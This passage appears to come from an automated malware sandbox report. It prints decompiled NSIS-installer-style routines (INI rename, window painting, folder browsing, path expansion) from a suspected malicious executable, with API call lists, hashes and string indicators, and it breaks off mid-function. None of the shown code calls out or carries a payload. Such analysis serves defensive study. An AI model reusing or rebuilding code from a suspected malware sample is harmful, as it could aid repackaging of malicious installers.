              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: KXCJDFJSKF$N
              • API String ID: 3103080414-3315232752
              • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
              • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406188(void* __ecx) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t12;
              				long _t24;
              				char* _t31;
              				int _t37;
              				void* _t38;
              				intOrPtr* _t39;
              				long _t42;
              				WCHAR* _t44;
              				void* _t46;
              				void* _t48;
              				void* _t49;
              				void* _t52;
              				void* _t53;
              
              				_t38 = __ecx;
              				_t44 =  *(_t52 + 0x14);
              				 *0x426de8 = 0x55004e;
              				 *0x426dec = 0x4c;
              				if(_t44 == 0) {
              					L3:
              					_t2 = _t52 + 0x1c; // 0x4275e8
              					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
              						_t53 = _t52 + 0x10;
              						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
              						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
              						_t48 = _t12;
              						 *(_t53 + 0x18) = _t48;
              						if(_t48 != 0xffffffff) {
              							_t42 = GetFileSize(_t48, 0);
              							_t6 = _t37 + 0xa; // 0xa
              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
              							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
              								L18:
              								return CloseHandle(_t48);
              							} else {
              								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
              									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
              									if(_t49 == 0) {
              										_t48 =  *(_t53 + 0x18);
              										L16:
              										_t24 = _t42;
              										L17:
              										E00405FED(_t24 + _t46, 0x4269e8, _t37);
              										SetFilePointer(_t48, 0, 0, 0);
              										E004060E4(_t48, _t46, _t42 + _t37);
              										GlobalFree(_t46);
              										goto L18;
              									}
              									_t39 = _t46 + _t42;
              									_t31 = _t39 + _t37;
              									while(_t39 > _t49) {
              										 *_t31 =  *_t39;
              										_t31 = _t31 - 1;
              										_t39 = _t39 - 1;
              									}
              									_t24 = _t49 - _t46 + 1;
              									_t48 =  *(_t53 + 0x18);
              									goto L17;
              								}
              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
              								_t42 = _t42 + 0xa;
              								goto L16;
              							}
              						}
              					}
              				} else {
              					CloseHandle(E00406032(_t44, 0, 1));
              					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						goto L3;
              					}
              				}
              				return _t12;
              			}

              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
              • GetShortPathNameW.KERNEL32 ref: 004061CC
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              • GetShortPathNameW.KERNEL32 ref: 004061E9
              • wsprintfA.USER32 ref: 00406207
              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
              • GlobalFree.KERNEL32 ref: 004062F0
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$[Rename]$mB$uB$uB
              • API String ID: 2171350718-2295842750
              • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
              • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
              				struct tagLOGBRUSH _v16;
              				struct tagRECT _v32;
              				struct tagPAINTSTRUCT _v96;
              				struct HDC__* _t70;
              				struct HBRUSH__* _t87;
              				struct HFONT__* _t94;
              				long _t102;
              				signed int _t126;
              				struct HDC__* _t128;
              				intOrPtr _t130;
              
              				if(_a8 == 0xf) {
              					_t130 =  *0x42a274;
              					_t70 = BeginPaint(_a4,  &_v96);
              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
              					_a8 = _t70;
              					GetClientRect(_a4,  &_v32);
              					_t126 = _v32.bottom;
              					_v32.bottom = _v32.bottom & 0x00000000;
              					while(_v32.top < _t126) {
              						_a12 = _t126 - _v32.top;
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
              						_t87 = CreateBrushIndirect( &_v16);
              						_v32.bottom = _v32.bottom + 4;
              						_a16 = _t87;
              						FillRect(_a8,  &_v32, _t87);
              						DeleteObject(_a16);
              						_v32.top = _v32.top + 4;
              					}
              					if( *(_t130 + 0x58) != 0xffffffff) {
              						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
              						_a16 = _t94;
              						if(_t94 != 0) {
              							_t128 = _a8;
              							_v32.left = 0x10;
              							_v32.top = 8;
              							SetBkMode(_t128, 1);
              							SetTextColor(_t128,  *(_t130 + 0x58));
              							_a8 = SelectObject(_t128, _a16);
              							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
              							SelectObject(_t128, _a8);
              							DeleteObject(_a16);
              						}
              					}
              					EndPaint(_a4,  &_v96);
              					return 0;
              				}
              				_t102 = _a16;
              				if(_a8 == 0x46) {
              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
              					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
              				}
              				return DefWindowProcW(_a4, _a8, _a12, _t102);
              			}

              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
              • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				long _v16;
              				long _v20;
              				long _v24;
              				char _v28;
              				intOrPtr _v32;
              				long _v36;
              				char _v40;
              				unsigned int _v44;
              				signed int _v48;
              				WCHAR* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				WCHAR* _v72;
              				void _v76;
              				struct HWND__* _v80;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t82;
              				long _t87;
              				short* _t89;
              				void* _t95;
              				signed int _t96;
              				int _t109;
              				signed short _t114;
              				signed int _t118;
              				struct HWND__** _t122;
              				intOrPtr* _t138;
              				WCHAR* _t146;
              				unsigned int _t150;
              				signed int _t152;
              				unsigned int _t156;
              				signed int _t158;
              				signed int* _t159;
              				signed int* _t160;
              				struct HWND__* _t166;
              				struct HWND__* _t167;
              				int _t169;
              				unsigned int _t197;
              
              				_t156 = __edx;
              				_t82 =  *0x422720;
              				_v32 = _t82;
              				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
              				if(_a8 == 0x40b) {
              					E00405B86(0x3fb, _t146);
              					E004067EB(_t146);
              				}
              				_t167 = _a4;
              				if(_a8 != 0x110) {
              					L8:
              					if(_a8 != 0x111) {
              						L20:
              						if(_a8 == 0x40f) {
              							L22:
              							_v8 = _v8 & 0x00000000;
              							_v12 = _v12 & 0x00000000;
              							E00405B86(0x3fb, _t146);
              							if(E00405F19(_t186, _t146) == 0) {
              								_v8 = 1;
              							}
              							E0040653C(0x421718, _t146);
              							_t87 = E00406931(1);
              							_v16 = _t87;
              							if(_t87 == 0) {
              								L30:
              								E0040653C(0x421718, _t146);
              								_t89 = E00405EBC(0x421718);
              								_t158 = 0;
              								if(_t89 != 0) {
              									 *_t89 = 0;
              								}
              								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
              									goto L35;
              								} else {
              									_t169 = 0x400;
              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
              									asm("cdq");
              									_v48 = _t109;
              									_v44 = _t156;
              									_v12 = 1;
              									goto L36;
              								}
              							} else {
              								_t159 = 0;
              								if(0 == 0x421718) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
              									if(_t114 != 0) {
              										break;
              									}
              									if(_t159 != 0) {
              										 *_t159 =  *_t159 & _t114;
              									}
              									_t160 = E00405E5D(0x421718);
              									 *_t160 =  *_t160 & 0x00000000;
              									_t159 = _t160;
              									 *_t159 = 0x5c;
              									if(_t159 != 0x421718) {
              										continue;
              									} else {
              										goto L30;
              									}
              								}
              								_t150 = _v44;
              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
              								_v44 = _t150 >> 0xa;
              								_v12 = 1;
              								_t158 = 0;
              								__eflags = 0;
              								L35:
              								_t169 = 0x400;
              								L36:
              								_t95 = E00404E20(5);
              								if(_v12 != _t158) {
              									_t197 = _v44;
              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
              										_v8 = 2;
              									}
              								}
              								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
              									E00404E08(0x3ff, 0xfffffffb, _t95);
              									if(_v12 == _t158) {
              										SetDlgItemTextW(_a4, _t169, 0x421708);
              									} else {
              										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
              									}
              								}
              								_t96 = _v8;
              								 *0x42a324 = _t96;
              								if(_t96 == _t158) {
              									_v8 = E0040140B(7);
              								}
              								if(( *(_v32 + 0x14) & _t169) != 0) {
              									_v8 = _t158;
              								}
              								E004044B4(0 | _v8 == _t158);
              								if(_v8 == _t158 &&  *0x423738 == _t158) {
              									E004048DC();
              								}
              								 *0x423738 = _t158;
              								goto L53;
              							}
              						}
              						_t186 = _a8 - 0x405;
              						if(_a8 != 0x405) {
              							goto L53;
              						}
              						goto L22;
              					}
              					_t118 = _a12 & 0x0000ffff;
              					if(_t118 != 0x3fb) {
              						L12:
              						if(_t118 == 0x3e9) {
              							_t152 = 7;
              							memset( &_v76, 0, _t152 << 2);
              							_v80 = _t167;
              							_v72 = 0x423748;
              							_v60 = E00404CD9;
              							_v56 = _t146;
              							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
              							_t122 =  &_v80;
              							_v64 = 0x41;
              							__imp__SHBrowseForFolderW(_t122);
              							if(_t122 == 0) {
              								_a8 = 0x40f;
              							} else {
              								__imp__CoTaskMemFree(_t122);
              								E00405E11(_t146);
              								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
              								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
              									E00406579(_t146, 0x423748, _t167, 0, _t125);
              									if(lstrcmpiW(0x428200, 0x423748) != 0) {
              										lstrcatW(_t146, 0x428200);
              									}
              								}
              								 *0x423738 =  *0x423738 + 1;
              								SetDlgItemTextW(_t167, 0x3fb, _t146);
              							}
              						}
              						goto L20;
              					}
              					if(_a12 >> 0x10 != 0x300) {
              						goto L53;
              					}
              					_a8 = 0x40f;
              					goto L12;
              				} else {
              					_t166 = GetDlgItem(_t167, 0x3fb);
              					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
              						E00405E11(_t146);
              					}
              					 *0x429238 = _t167;
              					SetWindowTextW(_t166, _t146);
              					_push( *((intOrPtr*)(_a16 + 0x34)));
              					_push(1);
              					E00404492(_t167);
              					_push( *((intOrPtr*)(_a16 + 0x30)));
              					_push(0x14);
              					E00404492(_t167);
              					E004044C7(_t166);
              					_t138 = E00406931(8);
              					if(_t138 == 0) {
              						L53:
              						return E004044F9(_a8, _a12, _a16);
              					} else {
              						 *_t138(_t166, 1);
              						goto L8;
              					}
              				}
              			}

              APIs
              • GetDlgItem.USER32 ref: 004049D2
              • SetWindowTextW.USER32(00000000,?), ref: 004049FC
              • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
              • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
              • lstrcmpiW.KERNEL32(KXCJDFJSKF,00423748,00000000,?,?), ref: 00404AEA
              • lstrcatW.KERNEL32(?,KXCJDFJSKF), ref: 00404AF6
              • SetDlgItemTextW.USER32 ref: 00404B08
                • Part of subcall function 00405B86: GetDlgItemTextW.USER32 ref: 00405B99
                • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                • Part of subcall function 004067EB: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                • Part of subcall function 00404D3F: SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$KXCJDFJSKF
              • API String ID: 2624150263-3518105192
              • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
              • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
              				signed int _v8;
              				struct _ITEMIDLIST* _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _t43;
              				WCHAR* _t44;
              				signed char _t46;
              				signed int _t47;
              				signed int _t48;
              				short _t58;
              				short _t60;
              				short _t62;
              				void* _t70;
              				signed int _t76;
              				void* _t82;
              				signed char _t83;
              				short _t86;
              				signed int _t96;
              				void* _t102;
              				short _t103;
              				signed int _t106;
              				signed int _t108;
              				void* _t109;
              				WCHAR* _t110;
              				void* _t112;
              
              				_t109 = __esi;
              				_t102 = __edi;
              				_t70 = __ebx;
              				_t43 = _a8;
              				if(_t43 < 0) {
              					_t43 =  *( *0x42923c - 4 + _t43 * 4);
              				}
              				_push(_t70);
              				_push(_t109);
              				_push(_t102);
              				_t96 =  *0x42a2b8 + _t43 * 2;
              				_t44 = 0x428200;
              				_t110 = 0x428200;
              				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
              					_t110 = _a4;
              					_a4 = _a4 & 0x00000000;
              				}
              				while(1) {
              					_t103 =  *_t96;
              					if(_t103 == 0) {
              						break;
              					}
              					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
              					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
              						break;
              					}
              					_t82 = 2;
              					_t96 = _t96 + _t82;
              					__eflags = _t103 - 4;
              					_a8 = _t96;
              					if(__eflags >= 0) {
              						if(__eflags != 0) {
              							 *_t110 = _t103;
              							_t110 = _t110 + _t82;
              							__eflags = _t110;
              						} else {
              							 *_t110 =  *_t96;
              							_t110 = _t110 + _t82;
              							_t96 = _t96 + _t82;
              						}
              						continue;
              					}
              					_t83 =  *((intOrPtr*)(_t96 + 1));
              					_t46 =  *_t96;
              					_t47 = _t46 & 0x000000ff;
              					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
              					_a8 = _a8 + 2;
              					_v28 = _t47 | 0x00008000;
              					_v24 = _t47;
              					_t76 = _t83 & 0x000000ff;
              					_v16 = _t76;
              					__eflags = _t103 - 2;
              					_v20 = _t76 | 0x00008000;
              					if(_t103 != 2) {
              						__eflags = _t103 - 3;
              						if(_t103 != 3) {
              							__eflags = _t103 - 1;
              							if(_t103 == 1) {
              								__eflags = (_t47 | 0xffffffff) - _v8;
              								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
              							}
              							L43:
              							_t48 = lstrlenW(_t110);
              							_t96 = _a8;
              							_t110 =  &(_t110[_t48]);
              							_t44 = 0x428200;
              							continue;
              						}
              						_t106 = _v8;
              						__eflags = _t106 - 0x1d;
              						if(_t106 != 0x1d) {
              							__eflags = (_t106 << 0xb) + 0x42b000;
              							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
              						} else {
              							E00406483(_t110,  *0x42a268);
              						}
              						__eflags = _t106 + 0xffffffeb - 7;
              						if(_t106 + 0xffffffeb < 7) {
              							L34:
              							E004067EB(_t110);
              						}
              						goto L43;
              					}
              					_t86 =  *0x42a26c;
              					__eflags = _t86;
              					_t108 = 2;
              					if(_t86 >= 0) {
              						L13:
              						_v8 = 1;
              						L14:
              						__eflags =  *0x42a304;
              						if( *0x42a304 != 0) {
              							_t108 = 4;
              						}
              						__eflags = _t47;
              						if(__eflags >= 0) {
              							__eflags = _t47 - 0x25;
              							if(_t47 != 0x25) {
              								__eflags = _t47 - 0x24;
              								if(_t47 == 0x24) {
              									GetWindowsDirectoryW(_t110, 0x400);
              									_t108 = 0;
              								}
              								while(1) {
              									__eflags = _t108;
              									if(_t108 == 0) {
              										goto L30;
              									}
              									_t58 =  *0x42a264;
              									_t108 = _t108 - 1;
              									__eflags = _t58;
              									if(_t58 == 0) {
              										L26:
              										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
              										__eflags = _t60;
              										if(_t60 != 0) {
              											L28:
              											 *_t110 =  *_t110 & 0x00000000;
              											__eflags =  *_t110;
              											continue;
              										}
              										__imp__SHGetPathFromIDListW(_v12, _t110);
              										__imp__CoTaskMemFree(_v12);
              										__eflags = _t60;
              										if(_t60 != 0) {
              											goto L30;
              										}
              										goto L28;
              									}
              									__eflags = _v8;
              									if(_v8 == 0) {
              										goto L26;
              									}
              									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
              									__eflags = _t62;
              									if(_t62 == 0) {
              										goto L30;
              									}
              									goto L26;
              								}
              								goto L30;
              							}
              							GetSystemDirectoryW(_t110, 0x400);
              							goto L30;
              						} else {
              							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
              							__eflags =  *_t110;
              							if( *_t110 != 0) {
              								L32:
              								__eflags = _t76 - 0x1a;
              								if(_t76 == 0x1a) {
              									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
              								}
              								goto L34;
              							}
              							E00406579(_t76, _t108, _t110, _t110, _t76);
              							L30:
              							__eflags =  *_t110;
              							if( *_t110 == 0) {
              								goto L34;
              							}
              							_t76 = _v16;
              							goto L32;
              						}
              					}
              					__eflags = _t86 - 0x5a04;
              					if(_t86 == 0x5a04) {
              						goto L13;
              					}
              					__eflags = _t76 - 0x23;
              					if(_t76 == 0x23) {
              						goto L13;
              					}
              					__eflags = _t76 - 0x2e;
              					if(_t76 == 0x2e) {
              						goto L13;
              					} else {
              						_v8 = _v8 & 0x00000000;
              						goto L14;
              					}
              				}
              				 *_t110 =  *_t110 & 0x00000000;
              				if(_a4 == 0) {
              					return _t44;
              				}
              				return E0040653C(_a4, _t44);
              			}

              APIs
              • GetSystemDirectoryW.KERNEL32(KXCJDFJSKF,00000400), ref: 004066BA
              • GetWindowsDirectoryW.KERNEL32(KXCJDFJSKF,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
              • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
              • SHGetPathFromIDListW.SHELL32(00000000,KXCJDFJSKF), ref: 00406717
              • CoTaskMemFree.OLE32(00000000), ref: 00406722
              • lstrcatW.KERNEL32(KXCJDFJSKF,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
              • lstrlenW.KERNEL32(KXCJDFJSKF,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: KXCJDFJSKF$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-2443651505
              • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
              • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004055A4(signed int _a4, WCHAR* _a8) {
              				struct HWND__* _v8;
              				signed int _v12;
              				WCHAR* _v32;
              				long _v44;
              				int _v48;
              				void* _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				WCHAR* _t27;
              				signed int _t28;
              				long _t29;
              				signed int _t37;
              				signed int _t38;
              
              				_t27 =  *0x429244;
              				_v8 = _t27;
              				if(_t27 != 0) {
              					_t37 =  *0x42a334;
              					_v12 = _t37;
              					_t38 = _t37 & 0x00000001;
              					if(_t38 == 0) {
              						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
              					}
              					_t27 = lstrlenW(0x422728);
              					_a4 = _t27;
              					if(_a8 == 0) {
              						L6:
              						if((_v12 & 0x00000004) == 0) {
              							_t27 = SetWindowTextW( *0x429228, 0x422728);
              						}
              						if((_v12 & 0x00000002) == 0) {
              							_v32 = 0x422728;
              							_v52 = 1;
              							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
              							_v44 = 0;
